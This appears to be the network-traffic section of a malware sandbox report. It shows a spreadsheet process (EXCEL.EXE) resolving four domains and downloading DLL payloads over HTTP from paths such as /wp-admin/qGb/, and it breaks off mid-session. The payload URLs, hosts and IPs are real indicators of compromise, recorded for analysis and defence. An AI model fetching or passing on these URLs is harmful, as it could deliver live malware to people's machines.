                                  May 23, 2022 09:50:16.903031111 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903031111 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903048992 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903053045 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903059959 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903064966 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903080940 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903080940 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903125048 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903131962 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903152943 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903168917 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903208017 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903219938 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903497934 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904134989 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904160023 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904177904 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904195070 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904201031 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904211998 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904213905 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904239893 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904262066 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904283047 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904300928 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904316902 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904331923 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904336929 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904345036 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904356003 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904370070 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904372931 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904375076 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904387951 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904392004 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904411077 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904412031 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904422998 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904428005 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904447079 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904455900 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904464006 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904468060 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904500008 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904509068 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904516935 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904517889 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904535055 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904553890 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904561996 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904568911 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904571056 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904573917 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904588938 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904588938 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904607058 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904607058 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904623985 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904639959 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904644012 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904663086 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904680014 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904696941 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904709101 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904714108 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904721022 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904733896 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904736996 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904751062 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904751062 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904766083 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904767990 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.904795885 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.904810905 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.905199051 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932307005 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932358980 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932379961 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932400942 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932430983 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932516098 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932547092 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932574987 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932626009 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932679892 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932688951 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932693958 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932698965 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932719946 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932748079 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932776928 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932780981 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932794094 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932806969 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932832956 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932836056 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932843924 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932863951 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932882071 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932892084 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932914019 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932919979 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932929993 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932946920 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.932965994 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.932986021 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.933315039 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.934030056 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.934113979 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.934144974 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.934148073 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.934161901 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.934170008 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.934181929 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.934220076 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935287952 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935317039 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935344934 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935374975 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935404062 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935408115 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935417891 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935422897 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935431004 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935444117 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935461998 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935476065 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935489893 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935508013 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935518026 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935539961 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935547113 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935559988 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935575008 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935594082 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935601950 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935615063 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935630083 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935647011 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935657978 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935674906 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935688972 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935705900 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935717106 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935725927 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935745001 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935760975 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935774088 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935791016 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935802937 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935823917 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935832024 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935842037 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935853004 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935882092 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935882092 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935894012 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935909986 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935924053 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935939074 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935955048 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.935966015 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.935983896 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.936007023 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.936023951 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.936036110 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.936053038 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.936062098 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.936089039 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.936091900 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.936101913 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.936121941 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.936136007 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.936177015 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.936693907 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.962658882 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.962712049 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.962750912 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.962790966 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.962830067 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.962861061 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.962871075 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.962878942 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.962889910 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.962913036 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.962913990 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.962953091 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.962955952 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.962992907 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.962996960 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963033915 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963038921 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963073015 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963073969 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963113070 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963113070 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963152885 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963155031 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963192940 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963192940 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963232994 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963233948 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963259935 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963275909 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963299990 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963299990 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963339090 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963340998 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963376999 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963381052 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963417053 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963417053 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963454962 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963455915 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963495016 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963495970 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963536024 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963567019 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963572979 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963574886 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963613987 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963617086 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963654041 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963655949 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963691950 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963696003 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963731050 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963732004 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963771105 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963773012 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963810921 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963813066 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963850975 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963852882 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963890076 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963896036 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963953018 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.963954926 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963994026 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.963999033 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964032888 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964036942 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964071035 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964076042 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964111090 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964118958 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964148998 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964152098 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964189053 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964190006 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964230061 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964243889 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964283943 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964322090 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964323044 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964360952 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964363098 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964399099 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964401960 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964438915 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964442968 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964488029 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964509010 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964557886 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964560032 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964602947 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964602947 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964639902 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964672089 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964680910 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.964682102 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.964720011 CEST8049174107.189.3.39192.168.2.22
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  May 23, 2022 09:50:01.881863117 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
                                  May 23, 2022 09:50:02.273823977 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
                                  May 23, 2022 09:50:06.393023968 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
                                  May 23, 2022 09:50:06.421401978 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
                                  May 23, 2022 09:50:10.200681925 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
                                  May 23, 2022 09:50:10.369116068 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
                                  May 23, 2022 09:50:13.578142881 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8
                                  May 23, 2022 09:50:13.687604904 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                  May 23, 2022 09:50:01.881863117 CEST | 192.168.2.22 | 8.8.8.8 | 0xd04f | Standard query (0) | learnviaonline.com | A (IP address) | IN (0x0001)
                                  May 23, 2022 09:50:06.393023968 CEST | 192.168.2.22 | 8.8.8.8 | 0xff53 | Standard query (0) | kolejleri.com | A (IP address) | IN (0x0001)
                                  May 23, 2022 09:50:10.200681925 CEST | 192.168.2.22 | 8.8.8.8 | 0x90dc | Standard query (0) | stainedglassexpress.com | A (IP address) | IN (0x0001)
                                  May 23, 2022 09:50:13.578142881 CEST | 192.168.2.22 | 8.8.8.8 | 0xa812 | Standard query (0) | milanstaffing.com | A (IP address) | IN (0x0001)
                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                  May 23, 2022 09:50:02.273823977 CEST | 8.8.8.8 | 192.168.2.22 | 0xd04f | No error (0) | learnviaonline.com | | 103.171.181.223 | A (IP address) | IN (0x0001)
                                  May 23, 2022 09:50:06.421401978 CEST | 8.8.8.8 | 192.168.2.22 | 0xff53 | No error (0) | kolejleri.com | | 85.114.142.153 | A (IP address) | IN (0x0001)
                                  May 23, 2022 09:50:10.369116068 CEST | 8.8.8.8 | 192.168.2.22 | 0x90dc | No error (0) | stainedglassexpress.com | | 66.71.247.68 | A (IP address) | IN (0x0001)
                                  May 23, 2022 09:50:13.687604904 CEST | 8.8.8.8 | 192.168.2.22 | 0xa812 | No error (0) | milanstaffing.com | | 107.189.3.39 | A (IP address) | IN (0x0001)
                                  • learnviaonline.com
                                  • kolejleri.com
                                  • stainedglassexpress.com
                                  • milanstaffing.com
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  0 | 192.168.2.22 | 49171 | 103.171.181.223 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Timestamp: May 23, 2022 09:50:02.445317984 CEST | kBytes transferred: 2 | Direction: OUT | Data:
                                  GET /wp-admin/qGb/ HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: learnviaonline.com
                                  Connection: Keep-Alive
                                  Timestamp: May 23, 2022 09:50:03.381975889 CEST | kBytes transferred: 3 | Direction: IN | Data:
                                  HTTP/1.1 200 OK
                                  Date: Mon, 23 May 2022 07:50:02 GMT
                                  Server: Apache
                                  Cache-Control: no-cache, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 23 May 2022 07:50:03 GMT
                                  Content-Disposition: attachment; filename="Jf8.dll"
                                  Content-Transfer-Encoding: binary
                                  Set-Cookie: 628b3cab47229=1653292203; expires=Mon, 23-May-2022 07:51:03 GMT; Max-Age=60; path=/
                                  Last-Modified: Mon, 23 May 2022 07:50:03 GMT
                                  Content-Length: 371200
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdownload


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  1 | 192.168.2.22 | 49172 | 85.114.142.153 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Timestamp | kBytes transferred | Direction | Data
                                  May 23, 2022 09:50:06.452677011 CEST | 392 | OUT | GET /wp-admin/REvup/ HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: kolejleri.com
                                  Connection: Keep-Alive
                                  May 23, 2022 09:50:06.527494907 CEST | 393 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Mon, 23 May 2022 07:50:06 GMT
                                  Content-Type: application/x-msdownload
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Powered-By: PHP/7.4.29
                                  Cache-Control: no-cache, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 23 May 2022 07:50:06 GMT
                                  Content-Disposition: attachment; filename="4HWP0KQI.dll"
                                  Content-Transfer-Encoding: binary
                                  Set-Cookie: 628b3cae78674=1653292206; expires=Mon, 23-May-2022 07:51:06 GMT; Max-Age=60; path=/
                                  Last-Modified: Mon, 23 May 2022 07:50:06 GMT
                                  Vary: Accept-Encoding,User-Agent
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  2 | 192.168.2.22 | 49173 | 66.71.247.68 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Timestamp | kBytes transferred | Direction | Data
                                  May 23, 2022 09:50:10.497107029 CEST | 646 | OUT | GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: stainedglassexpress.com
                                  Connection: Keep-Alive
                                  May 23, 2022 09:50:10.723124981 CEST | 648 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 23 May 2022 07:50:10 GMT
                                  Server: Apache
                                  X-Powered-By: PHP/7.3.33
                                  Cache-Control: no-cache, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 23 May 2022 07:50:10 GMT
                                  Content-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"
                                  Content-Transfer-Encoding: binary
